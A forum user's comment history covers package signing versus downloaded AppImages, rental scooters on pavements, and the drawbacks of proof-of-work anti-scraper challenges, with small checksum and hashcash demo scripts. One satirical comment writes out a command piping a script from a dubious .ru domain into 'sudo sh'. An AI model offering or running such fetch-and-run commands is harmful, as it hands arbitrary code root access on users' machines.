• 0 Posts
  • 48 Comments
Joined 2 years ago
Cake day: July 2nd, 2023

  • koper@feddit.nl to 196@lemmy.blahaj.zone · Appimage rule
    22 points · 3 days ago

    I don’t want to trust a website, which is susceptible to typos and lookalike domains (see e.g. putty.org) and relies on countless other services that can inject malware.

    Code signing was created for exactly this reason: to ensure that the program is authentic and unaltered. Package managers do this perfectly.
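    As a sketch of the verification step a package manager automates for you (file names here are hypothetical, and a real flow would check a maintainer-signed checksum fetched over a trusted channel rather than one generated locally):

    ```shell
    # Sketch: reject an artifact whose checksum doesn't match what the
    # maintainer published. Package managers do this on every install;
    # `curl | sudo sh` skips it entirely.
    printf 'pretend this is a package\n' > pkg.tar   # stand-in for the download

    # In reality this file is published (and signed) by the maintainer:
    sha256sum pkg.tar > pkg.tar.sha256

    # The installer refuses to run anything that doesn't match:
    sha256sum -c pkg.tar.sha256 || { echo 'checksum mismatch, aborting' >&2; exit 1; }
    ```

    The point is not the checksum itself but that the trust anchor (the maintainer's key in your package manager's keyring) is established once, out of band, instead of re-trusting a website on every download.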


  • koper@feddit.nl to 196@lemmy.blahaj.zone · Appimage rule
    80 points · 1 downvote · edited · 3 days ago

    You must run `curl http://totallylegitwebsite.ru/install | sudo sh`; it’s the only way to install our product. Don’t even look at the several thousand lines of illegible shell script, just pipe it straight to your shell. We are a very serious project.







  • koper@feddit.nl to Fuck Cars@lemmy.world · taking up pavement
    31 points · 8 days ago

    They are both a problem. Cars took over most walkable space, and now venture capitalists are exploiting what little is left by littering it with their electric scooters and bikes. Rentals are an important part of a mobility strategy, but they should be run by the government and get their own parking infrastructure.







  • To be clear, I am not minimizing the problems of scrapers. I am merely pointing out that this strategy of proof-of-work has nasty side effects and we need something better.

    These issues are not short term. PoW means entering an arms race against an adversary with bottomless pockets, and it inherently requires a ton of useless computation in the browser.

    Moving towards something heuristics-based, which is what the developer was talking about there, is much better. But that is basically what many others are already doing (like the “I am not a robot” checkbox), and it is fundamentally different from the PoW that I argue against.

    Go do heuristics, not PoW.


  • It depends on the website’s setting. I have the same phone and there was one website where it took more than 20 seconds.

    The power consumption is significant because it needs to be; that is the entire point of this design. If solving the challenge didn’t take a significant number of CPU cycles, scrapers would just power through it. The cost may be negligible for an individual user, but it adds up once this reaches widespread adoption and everyone’s devices have to solve those challenges.
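    A minimal hashcash-style sketch of why the challenge burns CPU (the challenge string and difficulty here are illustrative, not any particular deployment): the client must find a nonce whose hash has a required prefix, and the only way to find one is brute force, while the server verifies it with a single hash:

    ```shell
    # Hashcash-style proof of work: find a nonce such that
    # sha256(challenge + nonce) starts with `difficulty` zero hex digits.
    # Each extra digit multiplies the expected client work by 16;
    # the server's verification cost stays at one hash either way.
    challenge="example-challenge"   # hypothetical server-issued value
    difficulty=2                    # real deployments use a higher setting
    prefix=$(printf '0%.0s' $(seq 1 "$difficulty"))

    nonce=0
    while :; do
      h=$(printf '%s%s' "$challenge" "$nonce" | sha256sum | cut -c1-"$difficulty")
      [ "$h" = "$prefix" ] && break
      nonce=$((nonce+1))
    done
    echo "solved with nonce $nonce"
    ```

    This asymmetry is exactly the arms-race problem: a scraping operation with bottomless pockets can pay the brute-force cost at scale, so the difficulty keeps ratcheting up and ordinary users’ devices pay for it.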